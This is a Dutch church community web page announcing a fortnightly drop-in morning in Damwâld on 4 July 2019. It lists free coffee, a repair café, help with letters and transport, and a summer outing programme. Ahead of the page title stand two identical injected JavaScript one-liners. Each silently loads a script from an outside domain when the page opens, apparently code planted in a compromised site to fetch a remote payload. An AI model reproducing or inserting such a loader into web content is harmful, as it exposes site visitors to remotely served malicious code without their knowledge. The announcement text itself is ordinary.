;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); It Trefpunt ... inloopochtend 4 juli - PKN Damwâld

It Trefpunt … inloopochtend 4 juli

Gepubliceerd op: maandag 3 juni 2019

Eén keer in de 14 dagen, op donderdagochtend, is er Inloop vanaf 9.30 uur. In het voorjaar van 2016 zijn wij hiermee gestart en het is een groot succes. Iedereen, oud of jong en kerkelijk of niet, is van harte welkom. Er is gratis koffie/thee/fris en u kunt de krant lezen, spelletjes doen of gezellig met elkaar praten. We hebben ook veel boeken en tijdschriften die u kunt meenemen. U mag ook eigen boeken inleveren. Regelmatig is er tijd voor het maken van (wens) kaarten of bloemstukjes of voor schilderen en kwissen. Kapotte (elektrische) spulletjes meenemen voor ons repaircafe mag, indien u geen financiële of andere mogelijkheden heeft om die te laten maken. Wij bieden hulp bij moeilijke (financiële) brieven en vervoer als u naar de Inloopochtenden wilt of ergens anders naar toe moet bijv. het ziekenhuis. Voorlichting, over Zorg en WMO, krijgt u van het Friese Land, Zorgcombinatie Interzorg of de Buurtzorg. Medewerksters van die organisaties zijn om beurten aanwezig. De eerstvolgende keer is  4 juli en u bent vanaf 09.30 uur welkom in de ontvangstruimte van De Ontmoeting aan de Foarwei 48 in Damwâld.
Heeft u vragen, wilt u ergens gebruik van maken: koopschaafsma@hotmail.nl tel. 613765741

Programma juni/juli 2019 van It Trefpunt:

-woensdagmiddag 26 juni uitje naar het Fiskerhûske (eigen bijdrage 3 euro) en daarna een visje eten op Lauwersoog op eigen kosten. Na verlaten Fiskershûske ergens onderweg even koffiedrinken met iets lekkers te eten (geen kosten). Er hebben zich direct al 17 personen opgegeven. Opgeven kan nog steeds tot 25 juni bij Koop Schaafsma, tel. 0613765741. We vertrekken rond 13.30 uur bij de Ontmoeting.

-donderdagmorgen 4 juli Inloop met enkele rondes Bingo-gratis deelname

-donderdagmorgen 18 juli Inloop met aansluitend eten-wordt u aangeboden door It Trefpunt

-woensdagmiddag 24 juli: uitje voor degenen die niet konden op 26 juni of evt. een geheel nieuw uitstapje voor iedereen. Zodra bekend, dan volgt er nadere informatie.